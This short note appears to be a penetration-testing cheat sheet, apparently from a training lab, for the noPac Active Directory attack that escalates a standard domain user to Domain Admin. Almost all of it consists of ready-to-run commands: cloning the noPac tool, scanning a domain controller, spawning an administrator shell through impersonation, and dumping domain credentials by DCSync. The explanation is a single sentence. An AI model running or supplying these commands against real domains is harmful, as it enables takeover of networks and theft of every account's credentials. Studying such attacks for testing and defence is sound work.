Attack explaination: The attack allows intra-domain privilege escalation from standard domain user to Domain Admin level access
We change the
SamAccountNameof a computer account to match a Domain Controller’sSamAccountName.Needs current pwned account to be able to add 10 computer accounts to the domain
uhh#
git clone https://github.com/Ridter/noPac.git
cd ./noPACScan#
sudo python3 scanner.py "$domain/$user:$pass" -dc-ip $target -use-ldapRun#
sudo python3 noPac.py "$domain/$user:$pass" -dc-ip $target -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldapIf we
lscurrent directory, we can also see the kerberos ticket too.
DCSync#
sudo python3 noPac.py "$domain/$user:$pass" -dc-ip $target -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump